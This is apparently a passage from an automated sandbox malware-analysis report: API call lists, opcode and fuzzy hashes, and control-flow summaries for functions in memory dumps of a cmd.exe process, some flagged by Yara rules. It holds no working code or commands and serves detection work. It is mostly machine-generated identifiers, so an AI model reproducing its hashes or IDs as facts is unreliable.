                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f46a299389552f2f855f608c361cf6339d9bc9f42253d8c58ba4831e28a82f0b
                                                                                                                                            • Instruction ID: e8022053ca86a796dc76d73c720824e4b676c2045cc18ced353c5af1fab1c6ec
                                                                                                                                            • Opcode Fuzzy Hash: f46a299389552f2f855f608c361cf6339d9bc9f42253d8c58ba4831e28a82f0b
                                                                                                                                            • Instruction Fuzzy Hash: 5390027120161853D112B1584505707040987D0641F96C412A042C558D9B568A52A121
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
• API String ID: 2994545307-0
• Opcode ID: 51b29caaacdd9d30cb751e83867fdf490c81106f4341d83464b2331d47957a45
• Instruction ID: eaa7797777007ad6f48cad5dd302f7db0877ddc290c72952c313afa7d21abca4
• Opcode Fuzzy Hash: 51b29caaacdd9d30cb751e83867fdf490c81106f4341d83464b2331d47957a45
• Instruction Fuzzy Hash: 8290026921361442D181B158540960A040587D1602F96D415A001D558CCE1589695321
APIs
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d4ad0f372bba6718da78e318b9d436b0b2c0f76749e4899717f8a004aea36bc4
• Instruction ID: bcaa228f5234556105ac13570ea796e6f9f0a1fb62d32c597b797d54de2edf54
• Opcode Fuzzy Hash: d4ad0f372bba6718da78e318b9d436b0b2c0f76749e4899717f8a004aea36bc4
• Instruction Fuzzy Hash: 0F90027120161842D101B5985409646040587E0701F56D011A502C555ECB6589916131
APIs
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e0fd01cfc3dec3e308ea0821159004c3569da92a894d07726b7d2281039086e0
• Instruction ID: 970d0a6ce902d0efbbc6c8708ed3429807aae58939b513a7a33da6067275ce0f
• Opcode Fuzzy Hash: e0fd01cfc3dec3e308ea0821159004c3569da92a894d07726b7d2281039086e0
• Instruction Fuzzy Hash: D690027120161C82D101B1584405B46040587E0701F56C016A012C654D8B15C9517521
APIs
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 91c05152a42f42ce2e24c57f04c23f5dba6412237fda5a1d109ddf089fbbfee1
• Instruction ID: 197d6c85a851f397c672e529eac3e5ef98e6b6e7418448e5812c7feb7bf71307
• Opcode Fuzzy Hash: 91c05152a42f42ce2e24c57f04c23f5dba6412237fda5a1d109ddf089fbbfee1
• Instruction Fuzzy Hash: 4790027120169C42D111B158840574A040587D0701F5AC411A442C658D8B9589917121
APIs
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1f34f8e5bbbc334441f1c993150fbb6099bc4910c1218606ae1d99af3b7fb301
• Instruction ID: 4d300d48d0472e5aa5d0fa7ba3120ede5bcfa304fbcf28cb067fd859ca536629
• Opcode Fuzzy Hash: 1f34f8e5bbbc334441f1c993150fbb6099bc4910c1218606ae1d99af3b7fb301
• Instruction Fuzzy Hash: 6690027160571842D101B1584515706140587D0601F66C411A042C568D8B958A5165A2

Control-flow Graph
control_flow_graph 412 2f79039-2f7903b 413 2f79012-2f79035 call 2f7ab90 * 2 412->413 414 2f7903d-2f79082 call 2f7bd00 412->414 422 2f7915c-2f79162 414->422 423 2f79088-2f790d8 call 2f7bdd0 call 2f6ace0 call 2f74e40 414->423 433 2f790e0-2f790f1 Sleep 423->433 434 2f79156-2f7915a 433->434 435 2f790f3-2f790f9 433->435 434->422 434->433 436 2f79123-2f79144 call 2f78e70 435->436 437 2f790fb-2f79121 call 2f78c60 435->437 441 2f79149-2f7914c 436->441 437->441 441->434
APIs
• Sleep.KERNELBASE(000007D0), ref: 02F790E8
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: POST$net.dll$wininet.dll
• API String ID: 3472027048-3140911592
• Opcode ID: 34c9eb0dab7251759c49eff9c24ecd8a4c61c220e872b4a7ab5ab60c4733c7e8
• Instruction ID: 361511d0f4b4d1a510636d522afeee1bd82d02d994592a4ff24abb6d01c7fe91
• Opcode Fuzzy Hash: 34c9eb0dab7251759c49eff9c24ecd8a4c61c220e872b4a7ab5ab60c4733c7e8
• Instruction Fuzzy Hash: F831C1B2A00304AFD714EF68DC85FABB7B9FF48B44F00815AE6195B241D7B4A520CBA5

Control-flow Graph
control_flow_graph 442 2f79040-2f79082 call 2f7bd00 445 2f7915c-2f79162 442->445 446 2f79088-2f790d8 call 2f7bdd0 call 2f6ace0 call 2f74e40 442->446 453 2f790e0-2f790f1 Sleep 446->453 454 2f79156-2f7915a 453->454 455 2f790f3-2f790f9 453->455 454->445 454->453 456 2f79123-2f79144 call 2f78e70 455->456 457 2f790fb-2f79121 call 2f78c60 455->457 461 2f79149-2f7914c 456->461 457->461 461->454
APIs
• Sleep.KERNELBASE(000007D0), ref: 02F790E8
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 964e75058e19bee34e5a35c3c0312460f2476d776aa6c05d1c244d75a02e7c70
• Instruction ID: 0ae9fd8bc91fb2a83455d7b0c4d60924360ddc184774311bb4a455005c5da05c
• Opcode Fuzzy Hash: 964e75058e19bee34e5a35c3c0312460f2476d776aa6c05d1c244d75a02e7c70
• Instruction Fuzzy Hash: 2C3170B2A00745BBD724DF64CC89F67B7B9BB48B41F00801EF62A6B244D770A560CBA4

Control-flow Graph
control_flow_graph 568 2f7a630-2f7a661 call 2f7af20 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63AF8), ref: 02F7A65D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: f87cece2eab356ae95fa62d066573602cdf341cb3e197a3f68510ee7bc6dac76
• Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction Fuzzy Hash: 1FE04FB22002046BD714DF59DC44EEB77ADEF88750F014555FE0857241C630F910CAF0

Control-flow Graph
control_flow_graph 571 2f682d4-2f682d8 572 2f68331-2f68343 call 2f6ace0 571->572 573 2f682da-2f682db 571->573 575 2f68347-2f6835a call 2f74e40 572->575 573->575 576 2f682dd-2f682e1 573->576 584 2f6838e-2f68392 575->584 585 2f6835c-2f6836e PostThreadMessageW 575->585 579 2f682eb-2f682fd call 2f7b710 576->579 580 2f682e6 call 2f7b860 576->580 580->579 586 2f68370-2f6838b call 2f6a470 PostThreadMessageW 585->586 587 2f6838d 585->587 586->587 587->584
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 512dd3507357014abebb50c711ebdeca414d1cbdda25bfc6efbcc436685c2841
• Instruction ID: d4c6de7a8d60449dd3181dc0f805cbdaf3fcc381c6d86df3360b47def0f82056
• Opcode Fuzzy Hash: 512dd3507357014abebb50c711ebdeca414d1cbdda25bfc6efbcc436685c2841
• Instruction Fuzzy Hash: 21019C32A4022C7BE721AA609C06FFE7329EB44BD4F0D0169FF04FB181E651AC0A47E1

Control-flow Graph
control_flow_graph 590 2f6830c-2f6831f 591 2f68328-2f6832d 590->591 592 2f68323 call 2f7be20 590->592 593 2f68333-2f6833d 591->593 594 2f6832e call 2f7c9c0 591->594 592->591 595 2f68343-2f6835a call 2f74e40 593->595 596 2f6833e call 2f6ace0 593->596 594->593 600 2f6838e-2f68392 595->600 601 2f6835c-2f6836e PostThreadMessageW 595->601 596->595 602 2f68370-2f6838b call 2f6a470 PostThreadMessageW 601->602 603 2f6838d 601->603 602->603 603->600
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: fd4eaedba8f0315b12c40caa6cae9680a79d730ce5e31a0ec9beee2701ef203e
• Instruction ID: 57ba30f6c999a51925b3d33245eddc295f00383deacb585f086da0939577aefc
• Opcode Fuzzy Hash: fd4eaedba8f0315b12c40caa6cae9680a79d730ce5e31a0ec9beee2701ef203e
• Instruction Fuzzy Hash: D401F771A802287AE720A6948C02FFE7B2DAB01B95F08011AFF04FA1C1D6956A064BF1

Control-flow Graph: interactive graph for the function at 2f68310 (not reproduced in text)
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
• Instruction ID: d9be37e5f731db5b8ce4e2a93dba63b2071f390c98c5f18f0872a02d19a310e3
• Opcode Fuzzy Hash: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
• Instruction Fuzzy Hash: 9001D671A8032877E720A6949C07FFF776DAB40BD0F080119FF04BA1C1E6A569064BF6

Control-flow Graph: interactive graph for the function at 2f68393 (not reproduced in text)
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 5cd1f6cc8f78c83971fb9e7fe69c7b0573676a1284d43a86887f8d6ee48ddf22
• Instruction ID: 5c3b44297742c78b6c669f8ccf7d3a63e4c2c95872221cbe62da331a7acb82be
• Opcode Fuzzy Hash: 5cd1f6cc8f78c83971fb9e7fe69c7b0573676a1284d43a86887f8d6ee48ddf22
• Instruction Fuzzy Hash: 7BF0F672A8022877E7206A645C06FFF37299F41BD0F09455AFF44FF1C0D69669064AE5
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F6AD52
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 13af5e03ef168f434de02f5baddfa670a2c82f4f51bbd33bb45eb091d519bf8f
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: 13015EB5D0020DABDB10DAA0DD45FADB3B99F14348F1041A5EA09A7240FA30E714CB91
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F7A6F4
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction ID: 2e61177c4555b60f1e27cce0c8b2bbfe49601191f342caa05065856500255aae
• Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction Fuzzy Hash: A4015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97255D630E851CBA4
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6F040,?,?,00000000), ref: 02F791AC
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
• Instruction ID: cfe504f59c05317cdd9a6acea69d111c2d6fe0a080dc2d6d46e7c932eb1c8d61
• Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
• Instruction Fuzzy Hash: 62E06D333902043AE220659DAC02FA7B39D8B91B60F540026FB0DEB6C0D5D5F40146A4
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6F1C2,02F6F1C2,?,00000000,?,?), ref: 02F7A7C0
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
• Instruction ID: 6d7aa2e578cf505396c203937d505f98e488da6d95dee398abb513575a94fa21
• Opcode Fuzzy Hash: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
• Instruction Fuzzy Hash: 7EF0E5B2200204ABDB14DF54DC85EDB33A9EF49354F118099F90D6B241C635A805CBB0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6F1C2,02F6F1C2,?,00000000,?,?), ref: 02F7A7C0
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction ID: 75ed948eeea01032ae8cffd91dee8b21118287f7e20bf96ccfd2bfac2c049186
• Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction Fuzzy Hash: D7E01AB22002086BDB10DF49DC84EEB37ADAF88650F018155FA0857241C930E8108BF5
APIs
• RtlAllocateHeap.NTDLL(02F74526,?,02F74C9F,02F74C9F,?,02F74526,?,?,?,?,?,00000000,00000000,?), ref: 02F7A61D
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: 7875a93f98d0008d92576a12455f04f8456e69a5bf7fd8626a7cade016814903
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction Fuzzy Hash: 17E012B2200208ABDB14EF99DC40EAB77ADAF88654F118559FA085B281C630F9108AB0
APIs
• SetErrorMode.KERNELBASE(00008003,?,02F68D14,?), ref: 02F6F6EB
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
• Instruction ID: 7dc7791d81185e11b600ea05c4a3d98a5f24759e8d02d8857b15c552aa368018
• Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
• Instruction Fuzzy Hash: B0D0A7727503043BE610FBA89C07F2733CD9B44B54F490074FA49D73C3D954E0004565
APIs
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6bb2a9554a4a3d041af04f76dfc2cbacb770ef6f48ffa141e6d9246769ba2458
• Instruction ID: 4870a0da1a05c06da5554bc9bdcdd5c3d01eb0b63b632c31a1f43d1a663b3d06
• Opcode Fuzzy Hash: 6bb2a9554a4a3d041af04f76dfc2cbacb770ef6f48ffa141e6d9246769ba2458
• Instruction Fuzzy Hash: DAB09B719016D5C6EA11E76046097177D0467D1701F1AC461D303C641E4739C1D1F175
APIs
  • Part of subcall function 00248791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00246906,0000001F,?,00000080), ref: 00248791
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,0027C9E0,00000008), ref: 0024859E
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 002485BC
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00248614
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00248653
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0027C9D0,00000008), ref: 0024867D
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0027C970,00000020), ref: 00248698
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0027C930,00000020), ref: 002486B0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0027C8F0,00000020), ref: 002486C8
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0027C8B0,00000020), ref: 002486E0
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0027C870,00000020), ref: 002486F8
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0027C830,00000020), ref: 00248710
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0027C7F0,00000020), ref: 00248728
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0027C9C0,00000008), ref: 00248743
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0027C9B0,00000008), ref: 0024875B
                                                                                                                                            • setlocale.MSVCRT ref: 00248770
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                            • API String ID: 1351325837-2236139042
                                                                                                                                            • Opcode ID: 2f935beff5fe7bb022ac4ff25a7d3e581e8840c9f7a33c5823d160bf5919e031
                                                                                                                                            • Instruction ID: c9f335672356bd58fc1cf99f5374fa30c1fcff6c0c15c0de5b2b3dc5ad639d64
                                                                                                                                            • Opcode Fuzzy Hash: 2f935beff5fe7bb022ac4ff25a7d3e581e8840c9f7a33c5823d160bf5919e031
                                                                                                                                            • Instruction Fuzzy Hash: 27C12575730213A6DB358F399D1877B27ACAF50751F64412AEC4AEA284EFB0C929C364
                                                                                                                                            APIs
                                                                                                                                            • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0026C9D0,00000108,00252107,?,00000000,00000000,00000000), ref: 002494AA
                                                                                                                                            • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 002494D9
                                                                                                                                            • memset.MSVCRT ref: 002494F1
                                                                                                                                            • memset.MSVCRT ref: 0024954A
                                                                                                                                            • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0024955D
                                                                                                                                              • Part of subcall function 00251D90: _wcsnicmp.MSVCRT ref: 00251E14
                                                                                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 002495B8
                                                                                                                                            • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00249602
                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00249624
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0025BDF1
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0025BE0D
                                                                                                                                            • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0025BE26
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                            • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                            • API String ID: 1449572041-3461277227
                                                                                                                                            • Opcode ID: c3bf77921f9dba55a548bac8e105c924c7ab3d56929116fd5143514378c1a2b7
                                                                                                                                            • Instruction ID: d748aef526de5b3f3be81b5a5e997d82527a1a7e9e49892676a2cdf82477f4b5
                                                                                                                                            • Opcode Fuzzy Hash: c3bf77921f9dba55a548bac8e105c924c7ab3d56929116fd5143514378c1a2b7
                                                                                                                                            • Instruction Fuzzy Hash: 98C1B374A203159FDB28DF64DC49BAA77B8EB45304F1440AAFA0AD7240EB708DE4CF56
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
